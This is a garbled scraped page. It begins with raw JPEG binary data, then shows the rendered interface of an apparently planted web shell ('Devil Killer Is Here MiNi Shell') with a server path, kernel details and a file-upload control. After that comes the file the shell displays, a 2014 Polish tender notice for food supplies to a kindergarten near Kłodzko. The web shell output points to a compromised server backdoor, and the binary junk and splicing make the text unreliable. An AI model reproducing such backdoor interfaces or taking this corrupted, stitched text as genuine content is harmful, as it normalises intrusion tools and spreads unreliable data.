JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140804/168201-N-2014.html

<p class="kh_header"><b>Kłodzko: Dostaw artykułów żywnościowych do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach; Bierkowice 3; 57-300 Kłodzko</b><br>
<b>Numer ogłoszenia: 168201 - 2014; data zamieszczenia: 04.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Gminne z Oddziałami Integracyjnymi w Bierkowicach , Bierkowice 3, 57-300 Kłodzko, woj. dolnośląskie, tel. 74 8673122.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostaw artykułów żywnościowych do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach; Bierkowice 3; 57-300 Kłodzko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Przedszkola  Gminnego z Oddziałami Integracyjnymi w Bierkowicach; Bierkowice 3.
 Przedmiot zamówienia został podzielony na 5 części (zadania).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.98.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie , że posiada odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu ( Załącznik Nr 3), załącznik nr 1 do formularza ofertowego nr 1 - kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-klodzko.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole  Gminne z Oddziałami Integracyjnymi w Bierkowicach
Bierkowice 3   57-300 Kłodzko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2014 godzina 10:00, miejsce: Przedszkole  Gminne z Oddziałami Integracyjnymi w Bierkowicach
Bierkowice 3   57-300 Kłodzko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa produktów zwierzęcych, mięsa i przetworów mięsnych (mięso wieprzowe), mięsa i podrobów drobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek wędzony parzony 	kg	50
Kiełbasa (śląska  lub podobna)	kg         	400
Kiełbasa szynkowa   wieprzowa / mięsa nie mniej niż 80% /                  	kg	100
Polędwica sopocka /mięsa nie mniej niż 80%/	kg	100
Szynka drobiowa /mięsa nie mniej niż 80%/	kg	100
Szynka drobiowa z indyka /mięsa nie mniej niż 80%/	kg	60
Łopatka b/k	kg	330
Schab  b/k                       	kg	150
Szynka surowa b/k	kg           	200
Karczek b/k	kg	200
Polędwica wieprzowa surowa	kg	100
Wołowina b/k	kg	80
Kurczak 	kg	300
Filet z kurczaka /pierś/	kg	150
Filet z indyka /pierś/	kg	100
Udka z kurczaka	kg	160
Cielęcina b/k	kg	80
Parówki drobiowe /cienkie/	kg	130
Parówki wiedeńskie	kg	200
Parówki cielęce /paliszki/	kg	150
Wątróbka drobiowa	kg	100
Pasztet drobiowy prochowicki /160g puszka/	szt	300
Udka wędzone z kurczaka	kg	20
Kości wieprzowe	kg	100
Porcje rosołowe z kurczaka	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa produktów mleczarskich, oleju, produktów przemiału ziarna, owoców, warzyw i podobnych produktów przetworzonych, różnych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana  UHT 18 % tłuszczu 400ml.	szt.	500
Śmietana  UHT 30 % tłuszczu 500ml	szt	400
 Mleko 2% tłuszcz. w karonie 1litr	szt.	3 500
 Masło 80% tłuszcz. Kostka 200g	szt	2 500
Twaróg półtłusty  w papierku	kg	500
Maślanka w kartonie 1 litr	szt	50
Dżem truskawkowy z kawałkami owoców, słoik 280g	szt	200
 Dżem wiśniowy z kawałkami owoców 280g	szt	200
Dżem morelowy z kawałkami owoców 280g	szt	150
Dżem z czarnej porzeczki z kawałkami owoców 280g	szt	200
Ser żółty twardy z dziurami	kg	130
Ser wędzony twardy	kg	40
Ser topiony trójkąciki w opakowaniu 8szt. po 17,5g	op	150
Ser topiony plastry, każdy pakowany osobno w folię pakowany po 8szt w opakowaniu	op.	150
Serek homogenizowany naturalny/waniliowy/czekoladowy  opakowanie 150 g, skład: twaróg odtłuszczony, śmietanka, woda, cukier, syrop glukozowo fruktozowy, skrobia modyfikowana, naturalny aromat waniliowy lub z innymi aromatami naturalnymi, żelatyna, ekstrat z nagietka, typu  Danio lub równoważny	szt.	2 640
Serek typ.danonek op.50g	szt	3 200
Jogurt naturalny 132 g- 250g	szt.	300
Jogurt  owocowy 2% mix smaków opakowanie 150-250 g, skład: mleko pasteryzowane, cukier, kawałki owoców, substancje zagęszczające, żywe kultury bakterii, różne smaki,  typu Jogobella, Bakoma lub równoważny 	szt.	3 200
Deser  czekoladowo śmietankowy typ.monte   lub  równoważny  100g 	szt	2 400
Krem czekoladowy z kawałkami czekolady i orzechów typ nutella	szt	60
Drożdże piekarskie świeże kostka 10g 	szt	50
Olej rzepakowy  kujawski lub równoważny z pierwszego tłoczenia  w butelce 5-litrowej	szt	300
Kasza jęczmienna średnia   w op. 1kg	kg	70
Kasza gryczana w op.1 kg.	kg	70
Mąka pszenna Typ 500 wrocławska  opakowanie 1 kg, konsystencja sypka, bez grudek, barwa biała z odcieniem żółtym	kg	200
Mąka tortowa typ diamant 880  op. 1kg 	kg	150
Mąka ziemniaczana op. 0,5 kg	szt.	20
Ryż biały ziarnisty sonko lub równoważny w op 1  kg	kg	140
 Płatki kukurydziane na mleko op.250g	szt.	90
Kasza manna  	kg	20
Płatki jęczmienne op.1kg	kg	30
Kulki zbożowe o smaku miodowym op.1 kg	kg	60
Musli mieszanka zbożowa z suszonymi owocami na mleko op.1kg	kg	60
Płatki górskie na mleko op.05kg	kg	40
Syrop malinowy 100% soku op.1litr	szt.	100
Koncentrat buraczany op. 250-380g	szt	30
Chrzan tarty słoik na zaprawie kwasku cytryn. opakowanie 250g ml, produkt spożywczy otrzymany ze świeżych, pozbawionych skórki tartych korzeni chrzanu,  z dodatkiem kwasku cytrynowego, soli i cukru, struktura   przetarta masa z zawartością drobnych fragmentów korzeni chrzanu, smak i zapach   charakterystyczny dla chrzanu, lekko piekący, kwaśnosłodki, zawartość soli kuchennej nie więcej niż 2%, barwa biała zgodnie z normą PN-A-77806	szt.	15
Koncentrat pomidorowy 30 % - opakowanie 200gl, konsystencja stała w formie pasty, kolor czerwony, Pudliszki lub podobny  bez konserwantów.	szt.	200
Kukurydza konserwowa- puszka 300-340 g  ziarna młodej kukurydzy luzem w zalewie konserwującej, ziarna całe nieuszkodzone, zalewa barwy żółtej, opalizująca lub mętna z osadem kukurydzy na dnie opakowania, konsystencja kukurydzy miękka - wyrównana, smak i zapach - charakterystyczny dla kukurydzy bez obcych smaków i zapachów, zgodnie z normą PN-A-77807	szt.	180
Ogórek konserwowy cały - opakowanie 900 ml skład: ogórek 60%, ocet 10%, cukier 5%, sól 2%, woda 22%, przyprawy 1%, produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno-smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalany przez pasteryzację w opakowaniu hermetycznie zamkniętym,  struktura - ułożone całe ogórki, jędrne, chrupkie, powierzchnia ogórków wolna od  uszkodzeń mechanicznych  i plam chorobowych, smak i zapach charakterystyczny dla ogórków konserwowych słodo-kwaśny z wyczuwalnym smakiem i aromatem przypraw.	szt.	120
Groszek zielony  konserwowy  - puszka 240 -300g,  kolor zielony, soczysty, ziarna całe, niezepsute, bez obcych zapachów	szt.	100
Szczaw konserwowy, bez włókien,  słoik 280-380g 	szt.	40
Rosołki wołowy  60 g	szt	120
 Rosołki drobiowy 60 g	szt	120
Kakao rozpuszczalne Puchatek lub równoważne/250-350 g	szt.	50
Kawa  zbożowa 500 g	szt.	10
Herbata  expresowa  op.100 szt	szt.	80
Kompot wiśnia 0,9 litra	szt.	400
Kompot czarna porzeczka 0,9 litra	szt.	400
Kompot czereśniowy 0,9 l	szt	400
Kompot truskawka 0,9 l	szt	400
Syrop  malina     1 litr 	szt	15
Cukier kryształ    1kg	kg	800
Cukier waniliowy  10 g	szt	250
Cukier puder     0,5kg 	szt	20
Groch łuskany  1 kg opakowanie	szt	40
Jajka świeże kl. A rozmiar L , 2 - ściółkowy	szt	8 500
Kwasek cytrynowy   20 g	szt	90
Makaron świderki 2-4jajeczny , 100% semoliny poch. z przemiału pszenicy  durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella lub równoważny	kg	 60
Makaron gwiazdka 2-4 jajeczny, 100% semoliny poch. z przemiału pszenicy inticum durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella lub równoważny	kg	20
Makaron kokardka, 100% semoliny poch. z przemiału pszenicy inticum durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella lub równoważny	kg	50
Makaron zacierka babuni  opakowanie 250 g  100%semoliny poch. z przemiału pszenicy inticum durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella lub	szt	180
Makaron łazanka 2-4jajeczny  100% semoliny poch. z przemiału pszenicy inticum durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella ,Czaniecki lub równoważny	kg	30
Makaron nitki do rosołu opakowanie  250 g   100% semoliny poch. z przemiału pszenicy inticum durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella lub równoważny	szt	150
Makaron rurka 2-4jajeczny 100% semoliny poch. z przemiału pszenicy inticum durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella lub równoważny	kg	10
Makaron spagetti 2-4jajeczny 100% semoliny poch. z przemiału pszenicy inticum durum, bez dodatków i ulepszaczy, niesklejający się po ugotowaniu, typu Malma, Lubella lub równoważny	kg	50
Majeranek otarty - opakowanie 10g, aromatyczny, gorzki smak, typu Prymat, Kamis lub równoważny	szt	100
Majonez dekoracyjny -  słoik 320 ml, skład: olej roślinny, żółtka jajka, ocet, musztarda, cukier, sól, przyprawy, zawartość tłuszczu 80%, regulator kwasowości (kwasek cytrynowy), typu dekoracyjny Winiary lub równoważny	szt	200
 Budyń śmietankow/waniliowy op.50-70g	szt	400
  Ziele angielskie op.90-100g	szt	20
  Liść laurowy 40-50g	szt	10
 Papryka słodka sypka op.80-120g.	 szt	150
Galaretka wieloowocowa  typ.Winiary lub podobna                                75 g na wrzątek	 szt	500
Kisiel typ. Winiary lub podobny       60-90gg	szt	500
Oregano 10g paczka 	szt	15
Przyprawa do zup w płynie typ.magi- opakowanie 1 litrowe, skład: ekstrat z lubczyka, woda, sól, substancje wzmacniające smak i zapach (glutaminian sodu), ocet, glukoza, typu Kamis lub równoważna     	szt	70
Pieprz mielony czarny naturalny- opakowanie 20g, wyrazisty, ostry aromat i piekący smak, typu Prymat, Kamis lub równoważny       	szt	250
 Przyprawa do kurczaka sypka op.20g	szt	100
Sól kuchenna  z mikroelementami op.1 kg	szt	50
Sos neapolitański ,bolognes- opakowanie 6-80g g , skład: pomidory suszone 43%, cukier, skrobia, koncentrat pomidorowy min. 9%, skrobia modyfikowana, wzmacniacz smaku i zapachu, tłuszcz roślinny, mąka pszenna, cebula, zagęstnik: guma guar, bazylia, oregano, tymianek, pieprz, zapach swoisty bez obcych zapachów, typu Winiary, Knorr, Hugli lub równoważny               	szt	140
Sos pieczeniowy ciemny -sypki opakowanie                                      30 g  typu Winiary ,Knorr,lub równoważny	szt	140
Przyprawa warzywna sypka do potraw typ. Vegeta - opakowanie 250 g, skład: sól kuchenna, suszone warzywa 15,5% (marchew, pasternak, ziemniaki, cebula, seler, natka pietruszki), wzmacniacze smaku (glutaminian sodu, inozynian zasadowy), cukier przyprawy, skrobia kukurydziana, barwnik (ryboflawina), typu Podravka lub równoważna                  250 g	szt	180
Ketchup-sos pomidorowy łagodny typ pudliszki lub równoważny op.0,5-1litr składniki naturalne	szt	50
Zupa żurek w proszku  opakowanie 35 g Winiary lub podobna 	szt	250
Śledź w pomidorach-puszka 170-250g	szt	150
Makrela w pomidorach puszka 170-190g	szt	200
Przyprawa do gyrosa sypka op.30g	szt	50 
Margaryna mleczna op.250g	szt	240
Kasza kukurydziana 	kg	15
Mus owocowy typ.fruciak op.100-150g	szt	3200
Sok wieloowocowy / marchewkowy  typ. Witaminka 250ml.	szt	3 200
Sok marchewkowo-owocowy typ. Kubuś 250-330ml.	szt	3 200
Morele suszone 80-100g	kg	10
Orzechy łuskane-włoskie	kg	5
Cynamon op.80-100g	szt	20
Brzoskwinie w zalewie puszka 850g	szt	20
Ananas w zalewie puszka 850g	szt	20
Fasola czerwona w zalewie puszka 180-300g	szt	20
Fasola biała w zalewie puszka 180-300g	szt	20
Pomidor cały w zalewie puszka 400g	szt	20
Ciasteczka -herbatniki typ be-be	szt	900
Soda oczyszczona op.30g	szt	10
Miód wielokwiatowy prawdziwy  słoik 1kg      	kg	4
Rodzynki op.100g	szt	20
Proszek do pieczenia op.18g	szt	25
 Oliwa z oliwek         but.   1litr         	szt	5
Czosnek granulowany 15g	szt	50
Herbata owocowa mix smaków  po 25szt w opakowaniu	szt	40
Musztarda 	szt	10
Ocet winny op.0,5litra	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.40.00.00-2, 15.30.00.00-1, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mrożonek: ryb  mrożonych, mrożonych warzyw i owoców oraz innych produktów głęboko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z dorsza SHP/ bez glazury/	 kg	450
 Mieszanka kompotowa	 kg	300
Truskawki mrożone	 kg	400
Marchewka kostka	 kg	150
Kalafior mrożony 	 kg	200
Fasolka szparagowa	 kg	150
Brokuł mrożony	 kg	200
Mieszanka warzywna 8 składnikowa	 kg	150
Groszek mrożony	kg	20
Szpinak mrożony	kg	20
Warzywa królewskie /cząstki warzyw/	kg	150
Włoszczyzna krojona -paski	kg	110
Brukselka	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.33.00.00-0, 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa owoców, warzyw i podobnych produktów.</p>
